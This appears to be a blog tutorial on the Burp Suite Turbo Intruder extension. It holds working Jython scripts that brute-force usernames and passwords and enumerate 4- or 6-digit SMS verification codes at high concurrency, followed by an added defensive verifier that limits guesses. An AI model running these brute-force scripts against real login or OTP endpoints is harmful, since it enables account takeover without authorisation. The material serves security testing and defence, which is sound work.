Burp - Turbo Intruder
Original read on: 2023-07-11, views: 1

Turbo Intruder

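A summary of basic usage, with the Python code written down for reference. If anyone has clever tricks, I'd be glad to trade notes.

Personally I think this is an extremely powerful Burp extension; in any case, it is extremely fast.

Links:
https://github.com/PortSwigger/turbo-intruder/
https://youtu.be/vCpIAsxESFY
https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack

The video explains the underlying principles.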

Extender -> BApp Store -> Turbo Intruder

Or

Download manually -> import

https://github.com/PortSwigger/turbo-intruder/

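This is the method I chose. Probably because my network is so bad, the install from the Store kept failing.

Capture a request, right-click it and send it to Turbo Intruder.

The window has two panes, top and bottom.

Let's take directory brute-forcing as the example.

Mark the point to fuzz with %s.

Select the injection point -> load the wordlist -> Attack

To see the speed difference from the regular Burp Intruder, just try it yourself, haha.

Since it is this fast, wouldn't hunting for arbitrary user registration and login issues be fun? I'll add case studies later (2020.11.24, 12:14).

To boost the speed a lot, set pipeline to True.

Anyone who has studied HTTP request smuggling should already know what pipeline is (smirk).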

from urllib import quote  # Turbo Intruder scripts run on Jython (Python 2)

# Single %s in the request: one password candidate per request
def password_brute(target, engine):
    for word in open('F:/Tools/Dict/fuzzDicts-master/top10.txt'):
        engine.queue(target.req, quote(word.rstrip()))

# Single %s in the request: one username candidate per request
def user_brute(target, engine):
    for word in open('F:/Tools/Dict/fuzzDicts-master/top10.txt'):
        engine.queue(target.req, quote(word.rstrip()))

# Two %s in the request: every user/password combination
def user_password_brute(target, engine):
    for password in open('F:/Tools/Dict/fuzzDicts-master/top10.txt'):
        for user in open('F:/Tools/Dict/fuzzDicts-master/top10.txt'):
            engine.queue(target.req, [quote(user.rstrip()), quote(password.rstrip())])

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=100,
                           pipeline=True
                           )
    # Enable the one you need and comment out the others
    #user_brute(target, engine)
    #password_brute(target, engine)
    user_password_brute(target, engine)

def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    if req.status == 200:
        table.add(req)

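The if condition can be changed to suit your needs.

Use whichever function you need and comment out the ones you don't.

The last argument is the code length: pass 4 for a 4-digit verification code, 6 for a 6-digit one.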

from itertools import product

def brute_verify_code(target, engine, length):
    pattern = '1234567890'
    # Iterate lazily instead of building a list of every combination first
    for i in product(pattern, repeat=length):
        code = ''.join(i)
        engine.queue(target.req, code)

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=True
                           )
    brute_verify_code(target, engine, 6)

def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    if 'error' not in req.response:
        table.add(req)

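No demo here.

For this one, just go straight to real-world use, haha.

One thing to watch here is concurrentConnections and the number of for-loop iterations; try it out for yourselves, haha.

The SMS-receiving platform was garbage, so in the end I tested with my own phone number. Damn.

Writing a note even cost me SMS fees. Crying.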
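From the defender's side, the verification-code enumeration above only succeeds when the server accepts unlimited guesses against one issued code. The following is an added example, not code from the original post or from Turbo Intruder: a server-side verifier that burns a code after a few failed guesses. The class and function names, the 5-attempt cap, the 300-second lifetime and the in-memory store are all assumptions made for illustration.

```python
import hmac
import secrets
import time

MAX_ATTEMPTS = 5   # assumed policy: failed guesses allowed per issued code
CODE_TTL = 300     # assumed policy: code lifetime in seconds


class CodeVerifier:
    """Hypothetical server-side check for SMS/e-mail verification codes."""

    def __init__(self, length=6, clock=time.time):
        self.length = length
        self.clock = clock
        self._issued = {}  # account -> [code, expires_at, failed_attempts]

    def issue(self, account):
        # CSPRNG, zero-padded so every code has the full keyspace length.
        code = str(secrets.randbelow(10 ** self.length)).zfill(self.length)
        self._issued[account] = [code, self.clock() + CODE_TTL, 0]
        return code

    def verify(self, account, guess):
        entry = self._issued.get(account)
        if entry is None:
            return "no_code"
        code, expires_at, _failed = entry
        if self.clock() > expires_at:
            del self._issued[account]
            return "expired"
        # Constant-time comparison; a correct code is single-use.
        if hmac.compare_digest(code.encode(), str(guess).encode()):
            del self._issued[account]
            return "ok"
        entry[2] += 1
        if entry[2] >= MAX_ATTEMPTS:
            # Burn the code. The counter is keyed on the account, so more
            # connections or pipelining buy a client no extra guesses.
            del self._issued[account]
            return "locked"
        return "wrong"


def guess_success_probability(length, attempts=MAX_ATTEMPTS):
    """Chance that `attempts` distinct guesses hit one random numeric code."""
    return min(1.0, attempts / float(10 ** length))
```

With this cap a 6-digit code gives a guesser 5 chances in 1,000,000 per issued code, so code issuance itself also needs rate limiting per account and per source.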
